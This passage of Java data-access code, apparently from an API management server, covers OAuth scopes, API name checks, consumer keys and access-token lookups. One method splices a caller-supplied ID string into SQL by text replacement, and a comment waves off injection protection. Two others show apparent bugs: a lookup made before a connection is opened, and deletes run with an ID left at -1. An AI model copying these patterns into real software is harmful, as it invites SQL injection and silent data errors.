APIManagementException if failed to get external APIStores */ public Set<APIStore> getExternalAPIStoresDetails(APIIdentifier apiIdentifier, Connection conn) throws APIManagementException, SQLException { PreparedStatement ps = null; ResultSet rs = null; Set<APIStore> storesSet = new HashSet<APIStore>(); try { conn = APIMgtDBUtil.getConnection(); //This query to add external APIStores to database table String sqlQuery = SQLConstants.GET_EXTERNAL_API_STORE_DETAILS_SQL; ps = conn.prepareStatement(sqlQuery); int apiId; apiId = getAPIID(apiIdentifier, conn); if (apiId == -1) { String msg = "Could not load API record for: " + apiIdentifier.getApiName(); log.error(msg); throw new APIManagementException(msg); } ps.setInt(1, apiId); rs = ps.executeQuery(); while (rs.next()) { APIStore store = new APIStore(); store.setName(rs.getString("STORE_ID")); store.setDisplayName(rs.getString("STORE_DISPLAY_NAME")); store.setEndpoint(rs.getString("STORE_ENDPOINT")); store.setType(rs.getString("STORE_TYPE")); store.setPublished(true); storesSet.add(store); } } catch (SQLException e) { handleException("Error while getting External APIStore details from the database for the API : " + apiIdentifier.getApiName() + '-' + apiIdentifier.getVersion(), e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, rs); } return storesSet; } public void addScopes(Set<?> objects, APIIdentifier apiIdentifier, int apiID, int tenantID) throws APIManagementException { Connection conn = null; PreparedStatement ps = null, ps2 = null, ps3 = null; ResultSet rs = null; String scopeEntry = SQLConstants.ADD_SCOPE_ENTRY_SQL; String scopeRoleEntry = SQLConstants.ADD_SCOPE_ROLE_SQL; String scopeLink = SQLConstants.ADD_SCOPE_LINK_SQL; Boolean scopeSharingEnabled = false; if (!StringUtils.isEmpty(System.getProperty(APIConstants.ENABLE_API_SCOPES_SHARING))) { scopeSharingEnabled = Boolean.parseBoolean(System.getProperty(APIConstants.ENABLE_API_SCOPES_SHARING)); } try { conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(false); String scopeId = "SCOPE_ID"; if (conn.getMetaData().getDriverName().contains("PostgreSQL")) { scopeId = "scope_id"; } if (objects != null) { for (Object object : objects) { ps = conn.prepareStatement(scopeEntry, new String[]{scopeId}); ps2 = conn.prepareStatement(scopeLink); ps3 = conn.prepareStatement(scopeRoleEntry); if (object instanceof URITemplate) { URITemplate uriTemplate = (URITemplate) object; if (uriTemplate.getScope() == null) { continue; } if (!scopeSharingEnabled && isScopeKeyAssigned(apiIdentifier, uriTemplate.getScope().getKey(), tenantID)) { throw new APIManagementException("Scope '" + uriTemplate.getScope().getKey() + "' " + "is already used by another API."); } ps.setString(1, uriTemplate.getScope().getKey()); ps.setString(2, uriTemplate.getScope().getName()); ps.setString(3, uriTemplate.getScope().getDescription()); ps.setInt(4, tenantID); ps.execute(); rs = ps.getGeneratedKeys(); if (rs.next()) { uriTemplate.getScope().setId(rs.getInt(1)); } String roles = uriTemplate.getScope().getRoles(); //Adding scope bindings List<String> roleList = Lists.newArrayList(Splitter.on(",").trimResults().split(roles)); for (String role : roleList) { ps3.setInt(1, uriTemplate.getScope().getId()); ps3.setString(2, role); ps3.addBatch(); } ps3.executeBatch(); ps2.setInt(1, apiID); ps2.setInt(2, uriTemplate.getScope().getId()); ps2.execute(); conn.commit(); } else if (object instanceof Scope) { Scope scope = (Scope) object; if (!scopeSharingEnabled && isScopeKeyAssigned(apiIdentifier, scope.getKey(), tenantID)) { throw new APIManagementException("Scope '" + scope.getKey() + "' is already used " + "by another API."); } ps.setString(1, scope.getKey()); ps.setString(2, scope.getName()); ps.setString(3, scope.getDescription()); ps.setInt(4, tenantID); ps.execute(); rs = ps.getGeneratedKeys(); if (rs.next()) { scope.setId(rs.getInt(1)); } String roles = scope.getRoles(); //Adding scope bindings List<String> roleList = Lists.newArrayList(Splitter.on(",").trimResults().split(roles)); for (String role : roleList) { ps3.setInt(1, scope.getId()); ps3.setString(2, role); ps3.addBatch(); } ps3.executeBatch(); ps2.setInt(1, apiID); ps2.setInt(2, scope.getId()); ps2.execute(); conn.commit(); } } } } catch (SQLException e) { try { if (conn != null) { conn.rollback(); } } catch (SQLException e1) { handleException("Error occurred while Rolling back changes done on Scopes Creation", e1); } handleException("Error occurred while creating scopes ", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, rs); APIMgtDBUtil.closeAllConnections(ps2, null, null); } } /** * Check a given scope key already exist for a tenant * * @param scopeKey Scope Key * @param tenantId Tenant ID * @return true if scope already exists * @throws APIManagementException if an error occurs while executing db query */ private boolean isScopeExists(String scopeKey, int tenantId) throws APIManagementException { Connection conn = null; ResultSet resultSet = null; PreparedStatement ps = null; try { conn = APIMgtDBUtil.getConnection(); String sqlQuery = SQLConstants.GET_SCOPES_SQL; ps = conn.prepareStatement(sqlQuery); ps.setString(1, scopeKey); ps.setInt(2, tenantId); resultSet = ps.executeQuery(); if (resultSet.next()) { if (log.isDebugEnabled()) { log.debug("Scope key " + scopeKey + " for tenant " + tenantId + " exists."); } return true; } } catch (SQLException e) { handleException("Failed to check scope exists for scope " + scopeKey, e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, resultSet); } return false; } public Set<Scope> getAPIScopes(APIIdentifier identifier) throws APIManagementException { Connection conn = null; ResultSet resultSet = null; PreparedStatement ps = null; HashMap<Integer, Scope> scopeHashMap = new HashMap<>(); int apiId; try { conn = APIMgtDBUtil.getConnection(); apiId = getAPIID(identifier, conn); String sqlQuery = SQLConstants.GET_API_SCOPES_SQL; if (conn.getMetaData().getDriverName().contains("Oracle")) { sqlQuery = SQLConstants.GET_API_SCOPES_ORACLE_SQL; } ps = conn.prepareStatement(sqlQuery); ps.setInt(1, apiId); resultSet = ps.executeQuery(); while (resultSet.next()) { Scope scope; int scopeId = resultSet.getInt(1); if (scopeHashMap.containsKey(scopeId)) { // scope already exists append roles. scope = scopeHashMap.get(scopeId); scope.setRoles(scope.getRoles().concat("," + resultSet.getString(5)).trim()); } else { scope = new Scope(); scope.setId(scopeId); scope.setKey(resultSet.getString(2)); scope.setName(resultSet.getString(3)); scope.setDescription(resultSet.getString(4)); scope.setRoles(resultSet.getString(5).trim()); } scopeHashMap.put(scopeId, scope); } } catch (SQLException e) { handleException("Failed to retrieve api scopes ", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, resultSet); } return populateScopeSet(scopeHashMap); } public void addScopes(Connection conn, Set<?> objects, int api_id, int tenantID) throws APIManagementException { PreparedStatement ps = null; ResultSet rs = null; List<Integer> scopeIds = new ArrayList<Integer>(); String scopeEntry = SQLConstants.ADD_SCOPE_ENTRY_SQL; try { String scopeId = "SCOPE_ID"; if (conn.getMetaData().getDriverName().contains("PostgreSQL")) { scopeId = "scope_id"; } if (objects != null) { for (Object object : objects) { ps = conn.prepareStatement(scopeEntry, new String[]{scopeId}); if (object instanceof URITemplate) { URITemplate uriTemplate = (URITemplate) object; if (uriTemplate.getScope() == null) { continue; } ps.setString(1, uriTemplate.getScope().getKey()); ps.setString(2, uriTemplate.getScope().getName()); ps.setString(3, uriTemplate.getScope().getDescription()); ps.setInt(4, tenantID); ps.setString(5, uriTemplate.getScope().getRoles()); ps.execute(); rs = ps.getGeneratedKeys(); if (rs.next()) { int scopeIdValue = rs.getInt(1); uriTemplate.getScope().setId(scopeIdValue); scopeIds.add(scopeIdValue); } } else if (object instanceof Scope) { Scope scope = (Scope) object; ps.setString(1, scope.getKey()); ps.setString(2, scope.getName()); ps.setString(3, scope.getDescription()); ps.setInt(4, tenantID); ps.setString(5, scope.getRoles()); ps.execute(); rs = ps.getGeneratedKeys(); if (rs.next()) { int scopeIdValue = rs.getInt(1); scope.setId(scopeIdValue); scopeIds.add(scopeIdValue); } } } addScopeLinks(conn, scopeIds, api_id); } } catch (SQLException e) { handleException("Error occurred while creating scopes ", e); } finally { APIMgtDBUtil.closeAllConnections(ps, null, rs); } } private void addScopeLinks(Connection connection, List<Integer> scopeIds, int apiId) throws APIManagementException { String scopeLink = SQLConstants.ADD_SCOPE_LINK_SQL; PreparedStatement ps = null; try { if (scopeIds != null) { ps = connection.prepareStatement(scopeLink); for (Integer scopeId : scopeIds) { ps.setInt(1, apiId); ps.setInt(2, scopeId); ps.addBatch(); } ps.executeBatch(); } } catch (SQLException e) { handleException("Error occurred while creating scope links ", e); } finally { APIMgtDBUtil.closeAllConnections(ps, null, null); } } /** * Generate Set<Scope> from HashMap * * @return Set of Scopes populated with roles. */ private Set<Scope> populateScopeSet(HashMap<?, Scope> scopeHashMap) { Set<Scope> scopes = new LinkedHashSet<Scope>(); for (Scope scope : scopeHashMap.values()) { scopes.add(scope); } return scopes; } /** * Returns all the scopes assigned for given apis * * @param apiIdsString list of api ids separated by commas * @return Map<String, Set<Scope>> set of scopes for each apiId * @throws APIManagementException */ public Map<String, Set<Scope>> getScopesForAPIS(String apiIdsString) throws APIManagementException { ResultSet resultSet = null; PreparedStatement ps = null; Map<String, Set<Scope>> apiScopeSet = new HashMap<String, Set<Scope>>(); try (Connection conn = APIMgtDBUtil.getConnection()) { String sqlQuery = SQLConstants.GET_SCOPES_FOR_API_LIST; if (conn.getMetaData().getDriverName().contains("Oracle")) { sqlQuery = SQLConstants.GET_SCOPES_FOR_API_LIST_ORACLE; } // apids are retrieved from the db so no need to protect for sql injection sqlQuery = sqlQuery.replace("$paramList", apiIdsString); ps = conn.prepareStatement(sqlQuery); resultSet = ps.executeQuery(); while (resultSet.next()) { String apiId = resultSet.getString(1); Scope scope = new Scope(); scope.setId(resultSet.getInt(2)); scope.setName(resultSet.getString(3)); scope.setDescription(resultSet.getString(4)); Set<Scope> scopeList = apiScopeSet.get(apiId); if (scopeList == null) { scopeList = new LinkedHashSet<Scope>(); scopeList.add(scope); apiScopeSet.put(apiId, scopeList); } else { scopeList.add(scope); apiScopeSet.put(apiId, scopeList); } } } catch (SQLException e) { handleException("Failed to retrieve api scopes ", e); } return apiScopeSet; } public Set<Scope> getScopesBySubscribedAPIs(List<APIIdentifier> identifiers) throws APIManagementException { Connection conn = null; ResultSet resultSet = null; PreparedStatement ps = null; List<Integer> apiIds = new ArrayList<Integer>(); HashMap<String, Scope> scopeHashMap = new HashMap<>(); try { conn = APIMgtDBUtil.getConnection(); for (APIIdentifier identifier : identifiers) { apiIds.add(getAPIID(identifier, conn)); } String commaSeparatedIds = StringUtils.join(apiIds.iterator(), ','); String sqlQuery = SQLConstants.GET_SCOPE_BY_SUBSCRIBED_API_PREFIX + commaSeparatedIds + SQLConstants .GET_SCOPE_BY_SUBSCRIBED_ID_SUFFIX; if (conn.getMetaData().getDriverName().contains("Oracle")) { sqlQuery = SQLConstants.GET_SCOPE_BY_SUBSCRIBED_ID_ORACLE_SQL + commaSeparatedIds + SQLConstants.GET_SCOPE_BY_SUBSCRIBED_ID_SUFFIX; } ps = conn.prepareStatement(sqlQuery); resultSet = ps.executeQuery(); while (resultSet.next()) { Scope scope; String scopeKey = resultSet.getString(1); if (scopeHashMap.containsKey(scopeKey)) { // scope already exists append roles. scope = scopeHashMap.get(scopeKey); String roles = scope.getRoles(); if (StringUtils.isNotEmpty(roles)) { scope.setRoles(scope.getRoles().concat("," + resultSet.getString(4)).trim()); } } else { scope = new Scope(); scope.setKey(scopeKey); scope.setName(resultSet.getString(2)); scope.setDescription(resultSet.getString(3)); String roles = resultSet.getString(4); if (StringUtils.isNotEmpty(roles)) { scope.setRoles(resultSet.getString(4).trim()); } } scopeHashMap.put(scopeKey, scope); } } catch (SQLException e) { handleException("Failed to retrieve api scopes ", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, resultSet); } return populateScopeSet(scopeHashMap); } public Set<Scope> getAPIScopesByScopeKey(String scopeKey, int tenantId) throws APIManagementException { Connection conn = null; ResultSet resultSet = null; PreparedStatement ps = null; HashMap<Integer, Scope> scopeHashMap = new HashMap<>(); try { String sqlQuery = SQLConstants.GET_SCOPES_BY_SCOPE_KEY_SQL; conn = APIMgtDBUtil.getConnection(); ps = conn.prepareStatement(sqlQuery); ps.setString(1, scopeKey); ps.setInt(2, tenantId); resultSet = ps.executeQuery(); while (resultSet.next()) { Scope scope; int scopeId = resultSet.getInt(1); if (scopeHashMap.containsKey(scopeId)) { // scope already exists append roles. scope = scopeHashMap.get(scopeId); scope.setRoles(scope.getRoles().concat("," + resultSet.getString(5)).trim()); } else { scope = new Scope(); scope.setId(scopeId); scope.setKey(resultSet.getString(2)); scope.setName(resultSet.getString(3)); scope.setDescription(resultSet.getString(4)); scope.setRoles(resultSet.getString(5).trim()); } scopeHashMap.put(scopeId, scope); } } catch (SQLException e) { handleException("Failed to retrieve api scopes ", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, resultSet); } return populateScopeSet(scopeHashMap); } public Set<Scope> getScopesByScopeKeys(String scopeKeys, int tenantId) throws APIManagementException { Connection conn = null; ResultSet resultSet = null; PreparedStatement ps = null; List<String> inputScopeList = Arrays.asList(scopeKeys.split(" ")); StringBuilder placeHolderBuilder = new StringBuilder(); HashMap<Integer, Scope> scopeHashMap = new HashMap<>(); for (int i = 0; i < inputScopeList.size(); i++) { placeHolderBuilder.append("?, "); } String placeHolderStr = placeHolderBuilder.deleteCharAt(placeHolderBuilder.length() - 2).toString(); try { conn = APIMgtDBUtil.getConnection(); String sqlQuery = SQLConstants.GET_SCOPES_BY_SCOPE_KEYS_PREFIX + placeHolderStr + SQLConstants .GET_SCOPES_BY_SCOPE_KEYS_SUFFIX; if (conn.getMetaData().getDriverName().contains("Oracle")) { sqlQuery = SQLConstants.GET_SCOPES_BY_SCOPE_KEYS_PREFIX_ORACLE + placeHolderStr + SQLConstants.GET_SCOPES_BY_SCOPE_KEYS_SUFFIX; } ps = conn.prepareStatement(sqlQuery); for (int i = 0; i < inputScopeList.size(); i++) { ps.setString(i + 1, inputScopeList.get(i)); } ps.setInt(inputScopeList.size() + 1, tenantId); resultSet = ps.executeQuery(); while (resultSet.next()) { Scope scope; int scopeId = resultSet.getInt(1); if (scopeHashMap.containsKey(scopeId)) { // scope already exists append roles. scope = scopeHashMap.get(scopeId); scope.setRoles(scope.getRoles().concat("," + resultSet.getString(6)).trim()); } else { scope = new Scope(); scope.setId(scopeId); scope.setKey(resultSet.getString(2)); scope.setName(resultSet.getString(3)); scope.setDescription(resultSet.getString(4)); scope.setRoles(resultSet.getString(6).trim()); } scopeHashMap.put(scopeId, scope); } } catch (SQLException e) { handleException("Failed to retrieve api scopes ", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, resultSet); } return populateScopeSet(scopeHashMap); } /** * update URI templates define for an API * * @param api * @throws APIManagementException */ public void updateScopes(API api, int tenantId) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; int apiId = -1; String deleteResourceScopes = SQLConstants.REMOVE_RESOURCE_SCOPE_SQL; String deleteScopes = SQLConstants.REMOVE_SCOPE_SQL; try { connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); apiId = getAPIID(api.getId(), connection); if (apiId == -1) { //application addition has failed return; } prepStmt = connection.prepareStatement(deleteResourceScopes); prepStmt.setInt(1, apiId); prepStmt.execute(); prepStmt = connection.prepareStatement(deleteScopes); prepStmt.setInt(1, apiId); prepStmt.execute(); connection.commit(); } catch (SQLException e) { try { if (connection != null) { connection.rollback(); } } catch (SQLException e1) { handleException("Error occurred while Rolling back changes done on Scopes updating", e1); } handleException("Error while updating Scopes for API : " + api.getId(), e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, null); } addScopes(api.getUriTemplates(), api.getId(), apiId, tenantId); } public HashMap<String, String> getResourceToScopeMapping(APIIdentifier identifier) throws APIManagementException { Connection conn = null; ResultSet resultSet = null; PreparedStatement ps = null; HashMap<String, String> map = new HashMap<String, String>(); int apiId; try { String sqlQuery = SQLConstants.GET_RESOURCE_TO_SCOPE_MAPPING_SQL; apiId = getAPIID(identifier, conn); conn = APIMgtDBUtil.getConnection(); ps = conn.prepareStatement(sqlQuery); ps.setInt(1, apiId); resultSet = ps.executeQuery(); while (resultSet.next()) { map.put(resultSet.getString(1), resultSet.getString(2)); } } catch (SQLException e) { handleException("Failed to retrieve api scopes ", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, resultSet); } return map; } public Map<String, String> getScopeRolesOfApplication(String consumerKey) throws APIManagementException { Connection conn = null; ResultSet resultSet = null; PreparedStatement ps = null; try { conn = APIMgtDBUtil.getConnection(); String sqlQuery = SQLConstants.GET_SCOPE_ROLES_OF_APPLICATION_SQL; ps = conn.prepareStatement(sqlQuery); ps.setString(1, consumerKey); resultSet = ps.executeQuery(); Map<String, String> scopes = new HashMap<String, String>(); while (resultSet.next()) { if (scopes.containsKey(resultSet.getString(1))) { // Role for the scope exists. Append the new role. String roles = scopes.get(resultSet.getString(1)); roles += "," + resultSet.getString(2); scopes.put(resultSet.getString(1), roles); } else { scopes.put(resultSet.getString(1), resultSet.getString(2)); } } return scopes; } catch (SQLException e) { handleException("Failed to retrieve scopes of application" + consumerKey, e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, resultSet); } return null; } /** * Remove scope entries from DB, when delete APIs * * @param apiIdentifier The {@link APIIdentifier} of the API */ private void removeAPIScope(APIIdentifier apiIdentifier) throws APIManagementException { Set<Scope> scopes = getAPIScopes(apiIdentifier); Connection connection = null; PreparedStatement prepStmt = null; PreparedStatement deleteOauth2ResourceScopePrepStmt = null; PreparedStatement deleteOauth2ScopePrepStmt = null; int scopeId; int apiId = -1; String deleteAPIScopeQuery = SQLConstants.REMOVE_FROM_API_SCOPES_SQL; String deleteOauth2ScopeQuery = SQLConstants.REMOVE_FROM_OAUTH_SCOPE_SQL; String deleteOauth2ResourceScopeQuery = SQLConstants.REMOVE_FROM_OAUTH_RESOURCE_SQL; try { connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); prepStmt = connection.prepareStatement(deleteAPIScopeQuery); prepStmt.setInt(1, apiId); prepStmt.execute(); if (!scopes.isEmpty()) { deleteOauth2ResourceScopePrepStmt = connection.prepareStatement(deleteOauth2ResourceScopeQuery); deleteOauth2ScopePrepStmt = connection.prepareStatement(deleteOauth2ScopeQuery); for (Scope scope : scopes) { scopeId = scope.getId(); deleteOauth2ResourceScopePrepStmt.setInt(1, scopeId); deleteOauth2ResourceScopePrepStmt.addBatch(); deleteOauth2ScopePrepStmt.setInt(1, scopeId); deleteOauth2ScopePrepStmt.addBatch(); } deleteOauth2ResourceScopePrepStmt.executeBatch(); deleteOauth2ScopePrepStmt.executeBatch(); } connection.commit(); } catch (SQLException e) { handleException("Error while removing the scopes for the API: " + apiIdentifier.getApiName() + " from the database", e); } finally { APIMgtDBUtil.closeAllConnections(deleteOauth2ResourceScopePrepStmt, null, null); APIMgtDBUtil.closeAllConnections(deleteOauth2ScopePrepStmt, null, null); APIMgtDBUtil.closeAllConnections(prepStmt, connection, null); } } /** * Delete a user subscription based on API_ID, APP_ID, TIER_ID * * @param apiId - subscriber API ID * @param appId - application ID used to subscribe * @throws java.sql.SQLException - Letting the caller to handle the roll back */ private void deleteSubscriptionByApiIDAndAppID(int apiId, int appId, Connection conn) throws SQLException { String deleteQuery = SQLConstants.REMOVE_SUBSCRIPTION_BY_APPLICATION_ID_SQL; PreparedStatement ps = null; try { ps = conn.prepareStatement(deleteQuery); ps.setInt(1, apiId); ps.setInt(2, appId); ps.executeUpdate(); } finally { APIMgtDBUtil.closeAllConnections(ps, null, null); } } /** * Delete subscription based on API_PRODUCT_ID, APP_ID * * @param apiProductId - subscriber API_PRODUCT_ID * @param appId - application ID used to subscribe * @throws java.sql.SQLException - Letting the caller to handle the roll back */ private void deleteSubscriptionByApiProductIDAndAppID(int apiProductId, int appId, Connection conn) throws SQLException { String deleteQuery = SQLConstants.REMOVE_SUBSCRIPTION_BY_APPLICATION_ID_AND_PRODUCT_SQL; PreparedStatement ps = null; try { ps = conn.prepareStatement(deleteQuery); ps.setInt(1, apiProductId); ps.setInt(2, appId); ps.executeUpdate(); } finally { APIMgtDBUtil.closeAllConnections(ps, null, null); } } /** * Check the given api name is already available in the api table under given tenant domain * * @param apiName candidate api name * @param tenantDomain tenant domain name * @return true if the name is already available * @throws APIManagementException */ public boolean isApiNameExist(String apiName, String tenantDomain) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; ResultSet resultSet = null; String contextParam = "/t/"; String query = SQLConstants.GET_API_NAME_NOT_MATCHING_CONTEXT_SQL; if (!MultitenantConstants.SUPER_TENANT_DOMAIN_NAME.equals(tenantDomain)) { query = SQLConstants.GET_API_NAME_MATCHING_CONTEXT_SQL; contextParam += tenantDomain + '/'; } try { connection = APIMgtDBUtil.getConnection(); prepStmt = connection.prepareStatement(query); prepStmt.setString(1, apiName); prepStmt.setString(2, contextParam + '%'); resultSet = prepStmt.executeQuery(); int apiCount = 0; if (resultSet != null) { while (resultSet.next()) { apiCount = resultSet.getInt("API_COUNT"); } } if (apiCount > 0) { return true; } } catch (SQLException e) { handleException("Failed to check api Name availability : " + apiName, e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, resultSet); } return false; } /** * Check whether another API with a different letter case of the given api name is already available in the api * table under the given tenant domain * * @param apiName candidate api name * @param tenantDomain tenant domain name * @return true if a different letter case name is already available * @throws APIManagementException If failed to check different letter case api name availability */ public boolean isApiNameWithDifferentCaseExist(String apiName, String tenantDomain) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; ResultSet resultSet = null; String contextParam = "/t/"; String query = SQLConstants.GET_API_NAME_DIFF_CASE_NOT_MATCHING_CONTEXT_SQL; if (!MultitenantConstants.SUPER_TENANT_DOMAIN_NAME.equals(tenantDomain)) { query = SQLConstants.GET_API_NAME_DIFF_CASE_MATCHING_CONTEXT_SQL; contextParam += tenantDomain + '/'; } try { connection = APIMgtDBUtil.getConnection(); prepStmt = connection.prepareStatement(query); prepStmt.setString(1, apiName); prepStmt.setString(2, contextParam + '%'); prepStmt.setString(3, apiName); resultSet = prepStmt.executeQuery(); int apiCount = 0; if (resultSet != null) { while (resultSet.next()) { apiCount = resultSet.getInt("API_COUNT"); } } if (apiCount > 0) { return true; } } catch (SQLException e) { handleException("Failed to check different letter case api name availability : " + apiName, e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, resultSet); } return false; } public Set<String> getActiveTokensOfConsumerKey(String consumerKey) throws APIManagementException { Connection conn = null; ResultSet resultSet = null; PreparedStatement ps = null; Set<String> tokens = null; try { conn = APIMgtDBUtil.getConnection(); String sqlQuery = SQLConstants.GET_ACTIVE_TOKEN_OF_CONSUMER_KEY_SQL; ps = conn.prepareStatement(sqlQuery); ps.setString(1, consumerKey); resultSet = ps.executeQuery(); tokens = new HashSet<String>(); while (resultSet.next()) { tokens.add(APIUtil.decryptToken(resultSet.getString("ACCESS_TOKEN"))); } } catch (SQLException e) { handleException("Failed to get active access tokens for consumerKey " + consumerKey, e); } catch (CryptoException e) { handleException("Token decryption failed of an active access token of consumerKey " + consumerKey, e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, resultSet); } return tokens; } /** * Check the given scope key is already available under given tenant * * @param scopeKey candidate scope key * @param tenantId tenant id * @return true if the scope key is already available * @throws APIManagementException */ public boolean isScopeKeyExist(String scopeKey, int tenantId) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; ResultSet resultSet = null; String query = SQLConstants.GET_SCOPE_KEY_SQL; try { connection = APIMgtDBUtil.getConnection(); prepStmt = connection.prepareStatement(query); prepStmt.setString(1, scopeKey); prepStmt.setInt(2, tenantId); resultSet = prepStmt.executeQuery(); int scopeCount = 0; if (resultSet != null) { while (resultSet.next()) { scopeCount = resultSet.getInt("SCOPE_COUNT"); } } if (scopeCount > 0) { return true; } } catch (SQLException e) { handleException("Failed to check Scope Key availability : " + scopeKey, e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, resultSet); } return false; } /** * Check whether the given scope key is already assigned to another API than given under given tenant * * @param identifier API Identifier * @param scopeKey candidate scope key * @param tenantId tenant id * @return true if the scope key is already available * @throws APIManagementException if failed to check the context availability */ public boolean isScopeKeyAssigned(APIIdentifier identifier, String scopeKey, int tenantId) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; PreparedStatement prepStmt2 = null; ResultSet resultSet = null; ResultSet resultSet2 = null; String apiScopeQuery = SQLConstants.GET_API_SCOPE_SQL; String getApiQuery = SQLConstants.GET_API_ID_SQL; try { connection = APIMgtDBUtil.getConnection(); prepStmt = connection.prepareStatement(apiScopeQuery); prepStmt.setString(1, scopeKey); prepStmt.setInt(2, tenantId); resultSet = prepStmt.executeQuery(); if (resultSet != null && resultSet.next()) { int apiID = resultSet.getInt("API_ID"); String provider = resultSet.getString("API_PROVIDER"); String apiName = resultSet.getString("API_NAME"); prepStmt2 = connection.prepareStatement(getApiQuery); prepStmt2.setString(1, APIUtil.replaceEmailDomainBack(identifier.getProviderName())); prepStmt2.setString(2, identifier.getApiName()); prepStmt2.setString(3, identifier.getVersion()); resultSet2 = prepStmt2.executeQuery(); if (resultSet2 != null && resultSet2.next()) { //If the API ID is different from the one being saved if (apiID != resultSet2.getInt("API_ID")) { //Check if the provider name and api name is same. if (provider.equals(APIUtil.replaceEmailDomainBack(identifier.getProviderName())) && apiName .equals(identifier.getApiName())) { //Return false since this means we're attaching the scope to another version of the API. return false; } return true; } else { return false; } } } } catch (SQLException e) { handleException("Failed to check Scope Key availability : " + scopeKey, e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt2, null, resultSet2); APIMgtDBUtil.closeAllConnections(prepStmt, connection, resultSet); } return false; } public boolean isDuplicateContextTemplate(String contextTemplate) throws APIManagementException { Connection conn = null; ResultSet resultSet = null; PreparedStatement ps = null; String sqlQuery = SQLConstants.GET_CONTEXT_TEMPLATE_COUNT_SQL; try { conn = APIMgtDBUtil.getConnection(); ps = conn.prepareStatement(sqlQuery); ps.setString(1, contextTemplate); resultSet = ps.executeQuery(); if (resultSet.next()) { int count = resultSet.getInt("CTX_COUNT"); return count > 0; } } catch (SQLException e) { handleException("Failed to count contexts which match " + contextTemplate, e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, resultSet); } return false; } /** * retrieve list of API names which matches given context * * @param contextTemplate context template * @return list of API names * @throws APIManagementException */ public List<String> getAPINamesMatchingContext(String contextTemplate) throws APIManagementException { Connection conn = null; ResultSet resultSet = null; PreparedStatement ps = null; List<String> nameList = new ArrayList<String>(); String sqlQuery = SQLConstants.GET_API_NAMES_MATCHES_CONTEXT; try { conn = APIMgtDBUtil.getConnection(); ps = conn.prepareStatement(sqlQuery); ps.setString(1, contextTemplate); resultSet = ps.executeQuery(); while (resultSet.next()) { nameList.add(resultSet.getString("API_NAME")); } } catch (SQLException e) { handleException("Failed to get API names matches context " + contextTemplate, e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, resultSet); } return nameList; } /** * @param consumerKey * @return */ public boolean isMappingExistsforConsumerKey(String consumerKey) throws APIManagementException { Connection conn = null; ResultSet resultSet = null; PreparedStatement ps = null; String sqlQuery = SQLConstants.GET_APPLICATION_MAPPING_FOR_CONSUMER_KEY_SQL; try { conn = APIMgtDBUtil.getConnection(); ps = conn.prepareStatement(sqlQuery); ps.setString(1, consumerKey); resultSet = ps.executeQuery(); // We only expect one result. if (resultSet.next()) { String applicationId = resultSet.getString("APPLICATION_ID"); return (applicationId != null && !applicationId.isEmpty()); } } catch (SQLException e) { handleException("Failed to get Application ID by consumerKey ", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, resultSet); } return false; } /** * @param applicationId * @param keyType * @return */ public String getConsumerkeyByApplicationIdAndKeyType(String applicationId, String keyType) throws APIManagementException { Connection conn = null; ResultSet resultSet = null; PreparedStatement ps = null; String consumerKey = null; try { conn = APIMgtDBUtil.getConnection(); String sqlQuery = SQLConstants.GET_CONSUMER_KEY_BY_APPLICATION_AND_KEY_SQL; ps = conn.prepareStatement(sqlQuery); ps.setInt(1, Integer.parseInt(applicationId)); ps.setString(2, keyType); resultSet = ps.executeQuery(); while (resultSet.next()) { consumerKey = resultSet.getString("CONSUMER_KEY"); } } catch (SQLException e) { handleException("Failed to get consumer key by applicationId " + applicationId + "and keyType " + keyType, e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, resultSet); } return consumerKey; } /** * Get external APIStores details which are stored in database * * @param apiIdentifier API Identifier * @throws APIManagementException if failed to get external APIStores */ public String getLastPublishedAPIVersionFromAPIStore(APIIdentifier apiIdentifier, String storeName) throws APIManagementException { PreparedStatement ps = null; ResultSet rs = null; Connection conn = null; String version = null; try { conn = APIMgtDBUtil.getConnection(); String sqlQuery = SQLConstants.GET_LAST_PUBLISHED_API_VERSION_SQL; ps = conn.prepareStatement(sqlQuery); ps.setString(1, apiIdentifier.getProviderName()); ps.setString(2, apiIdentifier.getApiName()); ps.setString(3, storeName); rs = ps.executeQuery(); while (rs.next()) { version = rs.getString("API_VERSION"); } } catch (SQLException e) { handleException("Error while getting External APIStore details from the database for the API : " + apiIdentifier.getApiName() + '-' + apiIdentifier.getVersion(), e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, rs); } return version; } private String getScopeString(List<String> scopes) { return StringUtils.join(scopes, " "); } /** * Find all active access tokens of a given user. * * @param username - Username of the user * @return - The set of active access tokens of the user. */ public Set<String> getActiveAccessTokensOfUser(String username) throws APIManagementException { Connection conn = null; ResultSet resultSet = null; PreparedStatement ps = null; Set<String> tokens = null; String accessTokenStoreTable = APIConstants.ACCESS_TOKEN_STORE_TABLE; accessTokenStoreTable = getAccessTokenStoreTableNameOfUserId(username, accessTokenStoreTable); int tenantId = IdentityTenantUtil.getTenantIdOfUser(username); String userStoreDomain = IdentityUtil.extractDomainFromName(username).toUpperCase(); if (StringUtils.isEmpty(userStoreDomain)) { userStoreDomain = IdentityUtil.getPrimaryDomainName(); } else { //IdentityUtil doesn't have a function to 